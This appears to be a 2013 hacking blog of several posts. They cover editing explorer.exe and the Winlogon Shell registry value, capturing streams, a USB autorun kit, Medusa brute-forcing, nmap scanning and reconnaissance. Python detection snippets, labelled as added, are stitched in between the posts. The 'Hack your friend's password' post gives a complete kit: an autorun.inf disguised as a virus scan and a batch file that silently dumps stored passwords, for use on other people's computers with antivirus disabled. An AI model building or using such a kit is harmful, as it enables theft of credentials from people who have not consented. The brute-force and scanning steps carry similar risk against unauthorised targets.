Sunday, August 25, 2013

Hack XP

Change text on XP Start Button

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file, it requires a special editor. For the purposes of this article I have used Resource Hacker. Resource Hacker is a freeware utility to view, modify, rename, add, delete and extract resources in 32-bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

Get it from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer.exe. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign, then navigate down to and expand string 37, followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the string table. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered, the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File menu. Do not use the Save command. Make sure to use the Save As command and choose a new name for the file. Save the newly named file to C:\Windows.

Step 2 - Modify the Registry

!!! Make a backup of your registry before making changes !!!

Now that the modified explorer.exe has been created, it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse: go to Start (soon to be something else), then Run, and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In the Value data: field, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.
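A defender's check for the registry change described above (an added example, not part of the original post): parse a regedit export of the Winlogon key and flag a Shell value that is anything other than the stock explorer.exe, since the same value is a well-known persistence point for malware. The .reg text below is constructed, and comparing against "explorer.exe" as the expected default is an assumption of this check.

```python
import re

# Constructed sample of a "regedit /e" export (.reg format) of the Winlogon key, after
# the Shell value was pointed at a renamed explorer. Exports double every backslash.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer2.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"
"DefaultUserName"="user"
"""

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
EXPECTED_SHELL = "explorer.exe"   # stock value (regedit shows it as "Explorer.exe")

def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}; only "name"="string"
    (REG_SZ) values are kept, which is all this check needs."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None:
            m = re.match(r'^"([^"]+)"="(.*)"$', line)
            if m:
                name, raw = m.groups()
                # undo the export escaping of quotes and backslashes
                keys[current][name] = raw.replace('\\"', '"').replace("\\\\", "\\")
    return keys

def check_winlogon_shell(reg_text):
    """Return (ok, shell_value): ok is True only when Shell is the stock explorer.exe.
    A missing value cannot be confirmed from the export and is reported as not ok."""
    shell = parse_reg(reg_text).get(WINLOGON_KEY, {}).get("Shell")
    if shell is None:
        return False, None
    return shell.strip().lower() == EXPECTED_SHELL, shell
```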

Wednesday, August 21, 2013

Download any streaming file

HOW TO CAPTURE STREAMING MEDIA.

Many websites (http://ww.smashits.com, for example) stream songs and videos that people believe cannot be downloaded; quite why, I don't know. They seem to think there is no file present to download.

Once the stream URL is located, the file can be retrieved with NetTransport, which is able to download any file, whether over FTP, RTSP, etc.

  1. Download Project URL Snooper 1.02.01 from http://rain66.at.infoseek.co.jp/
  2. Install URL Snooper (and WinPcap together with it)
  3. Don't run URL Snooper when it is done installing
  4. Restart the computer
  5. Open Project URL Snooper
  6. Click on the General Options tab
  7. Choose a network adapter
  8. Now click on the Search tab
  9. Click Sniff Network
  10. Go to a webpage and you should see some results in the results list
  11. If nothing is appearing then choose another network adapter, until one works
  12. Now you are ready to begin searching
  13. Click the "Hide Non-Streaming URLs" option to hide all http:// references and only show URLs corresponding to streaming audio/video (rtsp, pnm, wma, etc.)
  14. Then click Sniff Network
  15. Your links should appear as you begin streaming your file
  16. Select your desired stream (usually an .rm file)
  17. At the bottom there should be the link, which you simply copy
  18. Download NetTransport from here:

    ftp://down_transport:123@s1.5fox.com/NT2Setup_multi.EXE or

    ftp://nettransport:nettransport@61.153.24...Setup_multi.EXE

    http://lycos26486.l97.lycos.com.cn/download.htm

    Or just google it.
  19. Install it
  20. Click on New
  21. Paste the link

Now you should be able to download any file. If you need any help, just ask. I think dial-up connections may have problems.

Monday, August 19, 2013

Hack your friend's password

How to hack passwords using USB Drive

Today I will show you how to hack passwords using a USB pen drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger etc.

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pendrive you can create your own rootkit to hack passwords from your friend’s/college computer.

We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassView: IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 - v6.0.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps.
  1. Download all 5 tools, extract them and copy only the executables (.exe files) into your USB pendrive.

     i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB drive.
  2. Create a new Notepad file and write the following text into it:

     [autorun]
     open=launch.bat
     ACTION= Perform a Virus Scan

     Save the Notepad file and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pendrive.
  3. Create another Notepad file and write the following text into it:

     start mspass.exe /stext mspass.txt
     start mailpv.exe /stext mailpv.txt
     start iepv.exe /stext iepv.txt
     start pspv.exe /stext pspv.txt
     start passwordfox.exe /stext passwordfox.txt

     Save the Notepad file and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps:
  1. Insert the pendrive and the autorun window will pop up. (This is because we have created an autorun pendrive.)
  2. In the pop-up window, select the first option (Perform a Virus Scan).
  3. Now all the password hacking tools will silently get executed in the background (this process takes hardly a few seconds). The passwords get stored in the .TXT files.
  4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.

NOTE: This procedure will only recover the stored passwords (if any) on the computer.
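The autorun.inf above is the whole trick: the AutoPlay dialog shows the ACTION label, while open= quietly runs launch.bat. The following is an added example (not from the post) of a check that inspects an autorun.inf found on removable media for exactly that pattern; both sample files are constructed, and the list of executable extensions is an assumption.

```python
import configparser

# Constructed autorun.inf matching the one built in the post above.
SUSPICIOUS_AUTORUN = """[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
"""

# Constructed benign autorun.inf, as a driver CD might carry: icon and label only.
BENIGN_AUTORUN = """[autorun]
icon=setup.exe,0
label=Driver Disc
"""

# Extensions that make open=/shellexecute= launch code rather than open a document.
EXECUTABLE_EXT = (".exe", ".bat", ".cmd", ".com", ".vbs", ".js", ".scr", ".pif")

def inspect_autorun(text):
    """Return a list of findings for an autorun.inf; an empty list means it launches nothing."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)   # option names are lower-cased, matching Windows' case-insensitive keys
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return ["no [autorun] section"]
    sec = cp[section]
    findings = []
    for key in ("open", "shellexecute"):
        target = sec.get(key, "").strip()
        # first token is the program; anything after it is command-line arguments
        if target and target.split()[0].lower().endswith(EXECUTABLE_EXT):
            findings.append(f"{key}= launches {target!r}")
    action = sec.get("action", "").strip()
    if action and findings:
        # AutoPlay displays the ACTION text as the menu entry, not the program behind it.
        findings.append(f"action= label {action!r} masks what is launched")
    return findings
```

Windows 7 out of the box, and XP/Vista after the 2011 AutoPlay update (KB971029), no longer honour autorun.inf on USB mass-storage devices, so the pop-up the post relies on does not appear on those systems.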

Saturday, August 17, 2013

BACKTRACK TUTORIALS

Exploitation

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.

Medusa comes installed on Backtrack 5. However, if you are using a different version of Backtrack without Medusa, type:

apt-get update

apt-get install medusa

When using online password crackers, the potential for success can be greatly increased if you combine this attack with information gathered from reconnaissance and scanning. An example of this is when you find usernames, passwords, and email addresses. Programs like Medusa will take a username and password list and keep guessing until it uses all the passwords. Be aware that some remote access systems employ a password throttling technique that can limit the number of unsuccessful log-ins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.

Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:

/pentest/passwords/wordlists/



In order to execute the brute-force attack, you open a terminal and type the following:

medusa -h target_ip -u username -P path_to_password_dictionary -M service_to_attack

"-h" is used to specify the IP address of the target host. The "-u" is used for a single username that Medusa will use to attempt log-ins. "-P" is used to specify an entire list containing multiple passwords. The "-P" needs to be followed by the actual location or path to the dictionary file. The "-M" switch is used to specify which service we want to attack.
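From the defender's side, a single-username Medusa run against SSH shows up as a burst of "Failed password" lines from one source, and the throttling and lockout the text mentions are driven by exactly this kind of count. The following is an added example (not from the tutorial): a sliding-window detector run over constructed sshd log lines, where the threshold, window and log year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines: one source hammers the root account, the pattern a
# single-username dictionary run leaves behind, and then gets in.
SAMPLE_LOG = """\
Aug 17 10:01:01 bt sshd[2001]: Failed password for root from 203.0.113.5 port 51001 ssh2
Aug 17 10:01:02 bt sshd[2002]: Failed password for root from 203.0.113.5 port 51002 ssh2
Aug 17 10:01:03 bt sshd[2003]: Failed password for invalid user admin from 198.51.100.7 port 40001 ssh2
Aug 17 10:01:04 bt sshd[2004]: Failed password for root from 203.0.113.5 port 51003 ssh2
Aug 17 10:01:05 bt sshd[2005]: Failed password for root from 203.0.113.5 port 51004 ssh2
Aug 17 10:01:06 bt sshd[2006]: Failed password for root from 203.0.113.5 port 51005 ssh2
Aug 17 10:01:08 bt sshd[2007]: Accepted password for root from 203.0.113.5 port 51006 ssh2
""".splitlines()

STAMP = r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAILED = re.compile(STAMP + r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(STAMP + r"Accepted \S+ for (\S+) from (\S+) port")

def _ts(stamp, year=2013):
    """Syslog stamps carry no year; the year is an assumption for this sample."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return alerts as (src_ip, kind, detail). A source is flagged once it has
    >= threshold failed logins inside any window_s span; a later successful login
    from a flagged source raises a second, higher-priority alert."""
    recent = defaultdict(deque)    # src_ip -> timestamps of failures still inside the window
    users = defaultdict(set)       # src_ip -> account names it tried
    flagged, alerts = set(), []
    for line in lines:
        m = FAILED.match(line)
        if m:
            ts, user, ip = _ts(m.group(1)), m.group(2), m.group(3)
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()        # drop failures that fell out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", f"{len(q)} failures in {window_s}s against {sorted(users[ip])}"))
            continue
        m = ACCEPTED.match(line)
        if m and m.group(3) in flagged:
            alerts.append((m.group(3), "success-after-bruteforce", f"logged in as {m.group(2)}"))
    return alerts
```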



More to come!

Friday, August 16, 2013

BACKTRACK TUTORIALS

SCANNING

The scanning process can be divided into three steps:
  1. Determining if a system is active.
  2. Port scanning the system.
  3. Scanning the system for vulnerabilities.
Step 1 is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.

Ports provide a location at which software on a computer can send and receive network traffic. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.


Common Ports and their Service

Port   Service
20     FTP data transfer
21     FTP control
22     SSH
23     Telnet
25     SMTP (e-mail)
53     DNS
80     HTTP
443    HTTPS

Pings and Ping Sweeps

A ping is a special type of network packet called an ICMP packet. Pings work by sending specific types of network traffic, called ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond back to the originating machine with an Echo Reply packet. Aside from telling us that a host is alive and accepting traffic, pings provide other valuable information including the total time it took for the packet to travel to the target and return. Pings also report traffic loss that can be used to gauge the reliability of a network connection.


The simplest way to run a ping sweep is with a tool called FPing. FPing is built into Backtrack and is run from the terminal. The easiest way to run FPing is to open a terminal window and type the following:

fping -a -g 172.16.45.1 172.16.45.254 > hosts.txt

The "-a" argument is used to show only the live hosts in the output. This makes our final report much cleaner and easier to read. The "-g" is used to specify the range of IP addresses we want to sweep. You need to enter both the beginning and the ending IP addresses. In this example, we scanned all the IPs from 172.16.45.1 to 172.16.45.254. The ">" character redirects the output to a file, and hosts.txt is the name of the file our results will be saved to.


Port Scanning

There are a total of 65,536 (0–65,535) ports on every computer. Ports can be either TCP or UDP depending on the service using the port. We scan computers to see what ports are in use or “open”. This gives us a better picture of the purpose of the machine, which gives us a better idea about how to attack the box.

TCP 3-Way Handshake

Before we go on, we first have to know how computers on a network communicate with each other. When two computers want to communicate, they go through a process known as the 3-way handshake. The first computer, A, sends a synchronize (SYN) packet to the other computer, B. Then, if computer B is listening (has its port open), it responds back to A with a synchronize-acknowledgement (SYN-ACK) packet. Finally, computer A sends an acknowledgement (ACK) packet to computer B, and the two computers communicate as usual.

Using Nmap

Nmap was written by Gordon Lyon and is available for free from www.insecure.org and is built into today’s Backtrack Linux 5.

Recommended Reading: Nmap Network Scanning

It is the official guide to using the nmap scanner. What more can I say? This book will cover nmap much more in depth than this site.

When we conduct a port scan, Nmap will create a packet and send it to each designated port on the computer just like the 3-way handshake. The goal is to determine what kind of a response we get from the target ports.

To use Nmap, open up the terminal and type:

nmap -p- 192.168.56.101



The "-p-" tells nmap to scan all ports on a target machine. The 10.0.2.15 is the local IP of the target machine.
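The handshake described above is also what a defender sees on the wire while a full "nmap -p-" runs: one source sending SYNs to many ports on one host, with SYN-ACK, RST or silence coming back. The following is an added example (not from the tutorial) that classifies each probed port from the replies and reports the scanning source; the packet records are constructed as a sniffer might summarise them, and the min_ports threshold is an assumption.

```python
from collections import defaultdict

SCANNER, TARGET, CLIENT = "192.168.56.1", "192.168.56.101", "192.168.56.50"

def _probe(t, port, reply):
    """Constructed exchange for one SYN probe: scanner SYN, the target's reply (if any),
    and the scanner's RST that tears a half-open connection down after a SYN-ACK."""
    pk = [(t, SCANNER, TARGET, 40000 + port, port, "S")]
    if reply:
        pk.append((t + 0.001, TARGET, SCANNER, port, 40000 + port, reply))
    if reply == "SA":
        pk.append((t + 0.002, SCANNER, TARGET, 40000 + port, port, "R"))
    return pk

# Constructed packet summaries (time_s, src, dst, sport, dport, flags): a scan of ports
# 1-30 where 21 and 22 are open, 25 never answers and the rest reply RST/ACK, plus one
# ordinary client completing a normal three-way handshake to port 22.
PACKETS = []
for p in range(1, 31):
    PACKETS += _probe(p * 0.01, p, "SA" if p in (21, 22) else None if p == 25 else "RA")
PACKETS += [(5.000, CLIENT, TARGET, 50123, 22, "S"),
            (5.001, TARGET, CLIENT, 22, 50123, "SA"),
            (5.002, CLIENT, TARGET, 50123, 22, "A")]

def handshake_outcomes(packets):
    """Map each probed (client, server, port) to open / closed / no-response, judged
    from how the server answered the client's SYN."""
    state = {}
    for _t, src, dst, sport, dport, flags in sorted(packets):
        if flags == "S":
            state.setdefault((src, dst, dport), "no-response")
            continue
        key = (dst, src, sport)      # a reply travels from the server's port back to the client
        if key not in state:
            continue                  # client-side ACK/RST or unrelated traffic
        if flags == "SA":
            state[key] = "open"       # SYN-ACK: something is listening
        elif "R" in flags and state[key] == "no-response":
            state[key] = "closed"     # RST instead of SYN-ACK: nothing listening
    return state

def find_scanners(packets, min_ports=10):
    """Report sources that probed at least min_ports distinct ports on one host,
    together with the ports that answered as open."""
    probes = defaultdict(dict)
    for (client, server, port), st in handshake_outcomes(packets).items():
        probes[(client, server)][port] = st
    report = {}
    for (client, server), ports in probes.items():
        if len(ports) >= min_ports:
            report[client] = {"target": server, "probed": len(ports),
                              "open": sorted(p for p, s in ports.items() if s == "open")}
    return report
```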


Vulnerability Scanning
To scan systems for vulnerabilities, we will use a vulnerability scanner. There are several good scanners available, but we will be focusing on Nessus. To install Nessus, type:

root@bt:~# apt-get install nessus

Then, to access Nessus via the GUI go to:

Applications -> Backtrack -> Vulnerability Assessment -> Vulnerability Scanner -> Nessus -> Nessus Start.

Tuesday, August 13, 2013

Reconnaissance

Penetration Testing Reconnaissance

We want to begin a pen test by reviewing the target’s website. We may actually use a tool called HTTrack to make a page-by-page copy of the website. HTTrack is a free program that creates an identical, off-line copy of the target website. The copied website will include all the pages, links, pictures, and code from the original website; however, it will reside on your local computer. Using a website copying tool like HTTrack allows us to explore and thoroughly mine the website “off-line” without having to spend additional time traipsing around on the company’s web server.

To install HTTrack open the console and type:

sudo apt-get install httrack

Once it is installed, begin HTTrack by typing httrack in the console:



Next, name your project whatever you want. Select a path where you want to save the off-line copy. I just left it as default (/home/websites). Just hit enter to leave it as such. Then enter the site you want to copy. I am using my own site since I will not get in trouble for copying it. (Please do not copy my site… Thanks!).



Pick an action you want. If you want to copy the site, press 1 then enter. HTTrack has a few options for you to pick from including a proxy to help cover your tracks. I am just using the basics for demonstration. I recommend you use a proxy when doing a real pen test.



After HTTrack finishes, you will have a complete off-line copy of the target site which you can review for information.

The Harvester

The Harvester is a simple Python script written by Christian Martorella at Edge Security. This tool allows us to quickly catalog both e-mail addresses and subdomains that are directly related to the target system.

The Harvester can be used to search Google and Bing for e-mails, hosts, and subdomains. It can also search LinkedIn for user names. Oftentimes you will find an email address, which could double as a login or user name.

To use theHarvester, first type in your console:

root@bt:~# cd /pentest/enumeration/theharvester

root@bt:~# ./theHarvester.py -d backtracktutorials.com -l 10 -b google.com

-d is used to specify the target domain.

A lowercase -l (that's 'L', not a '1') is used to limit the number of results returned to us. In this case, the tool was instructed to return only 10 results. The -b is used to specify what public repository we want to search. We can choose among Google, Bing, PGP, or LinkedIn.